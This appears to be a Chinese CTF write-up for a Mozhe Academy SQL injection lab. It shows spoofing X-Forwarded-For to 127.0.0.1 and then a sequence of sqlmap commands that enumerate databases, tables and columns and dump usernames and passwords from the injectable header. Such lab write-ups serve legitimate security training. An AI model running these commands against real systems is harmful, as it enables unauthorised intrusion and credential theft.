【CTF解题】墨者学院 SQL注入实战
2021-03-05 / 0 评论 / 27 阅读 / 2 点赞

【CTF解题】墨者学院 SQL注入实战

发光的神
2021-03-05 / 0 评论 / 27 阅读 / 正在检测是否收录...

sqlmap注入

ldqs5hp4.png

首先寻找注入点,题目给我们提示了X-Forwarded-for,说明题需要使用到。

ldqsc9c1.png

我使用了Fiddler抓包或burpsuite,尝试随便输入一个账号密码,登录发现出来一个弹窗,在浏览器显示乱码了,但在抓包软件里能看到,很显然需要是内网本机才能登录。

ldqsmle7.png

这里给提交登录的POST请求头加上了 x-forwarded-for: 127.0.0.1

ldqss4rl.png

经过几轮测试,发现账号密码没有注入点而x-forwarded-for 存在sql注入点。

ldqt1x4s.png

ldqt27zl.png

ldqt5w7j.png

把提交的数据都写在一个txt文本文档里,导入sqlmap进行自动注入。

ldqtdtje.png

sqlmap -r a.txt -dbs -batch

首先列出可用的数据库列表。

ldqthvbz.png

sqlmap -r a.txt -D webcalendar -tables -batch

再看数据库有哪些表。

ldqtlbsd.png

sqlmap -r a.txt -D webcalendar -T user -columns -batch

再查看表的字段。

ldqtome9.png

sqlmap -r a.txt -D webcalendar -T user -C username,password -dump -batch

最后输出字段内容。

ldqtq0zt.png

这道题考验我们的并不是x-Forwared-for的设置,而是存在sql注入点的利用。

2

评论 (0)

取消
0:00